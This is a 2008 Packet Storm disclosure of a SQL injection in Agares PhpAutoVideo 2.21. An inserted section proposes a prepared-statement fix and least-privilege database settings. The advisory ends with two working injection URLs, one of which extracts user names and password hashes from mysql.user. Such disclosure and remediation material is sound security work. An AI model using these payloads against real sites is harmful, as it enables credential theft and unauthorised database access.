agares-sql.txt

2008-01-12T00:00:00
ID PACKETSTORM:62567
Type packetstorm
Reporter ka0x
Modified 2008-01-12T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
D.O.M TEAM 2008  
we are: ka0x, an0de, xarnuz  
bug found by ka0x  
contact: ka0x01[at]gmail.com  
#from spain  
  
vulnerability in /includes/articleblock.php  
  
vuln code:  
------------------------------------------------------------------  
$cat = $_GET['articlecat'];  
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }  
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }  
------------------------------------------------------------------  
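The defect above is that `$_GET['articlecat']` is interpolated straight into the query string, so the `WHERE catid=` clause can be rewritten by the client. The following is an added example of a hardened replacement, not code from PhpAutoVideo; it assumes an existing PDO connection in `$pdo` and that `catid` is an integer column as the original query implies.

```php
<?php
// Added example (not part of the PhpAutoVideo code base): a hardened version of
// the query in includes/articleblock.php. Assumes $pdo is an open PDO
// connection to the same database (how it is created is out of scope here).

function fetch_articles(PDO $pdo, ?string $rawCat): array
{
    // Case 1: parameter absent or empty -> list all articles, matching the
    // original NULL branch. No user-controlled text reaches the SQL string.
    if ($rawCat === null || $rawCat === '') {
        return $pdo->query('SELECT * FROM amcms_articles')
                   ->fetchAll(PDO::FETCH_ASSOC);
    }

    // Case 2: catid is numeric, so reject anything that is not a non-negative
    // integer before it gets anywhere near SQL. filter_var() returns false for
    // values such as "-1/**/union/**/select ..." or "1 OR 1=1".
    $cat = filter_var($rawCat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($cat === false) {
        http_response_code(400);   // malformed request; optionally log it
        return [];
    }

    // Case 3: even after validation, bind the value as a typed parameter so the
    // query structure is fixed before the value is supplied to the server.
    $stmt = $pdo->prepare('SELECT * FROM amcms_articles WHERE catid = :catid');
    $stmt->bindValue(':catid', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage from articleblock.php (replaces the $cat / $sql block):
// $articles = fetch_articles($pdo, $_GET['articlecat'] ?? null);
```

Two details worth keeping in mind: set `PDO::ATTR_EMULATE_PREPARES` to `false` on the connection so the driver uses real server-side prepared statements rather than client-side quoting, and, since the advisory itself notes that reading `mysql.user` requires a root or administrator account, run the application under a dedicated MySQL user that holds only `SELECT` on the `amcms_*` tables it needs. That way an injection that slips past the code change still cannot reach the privilege tables.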
  
The database user must be root@localhost or a MySQL administrator; check with:  
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*  
  
user and password from mysql.user:  
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*  
  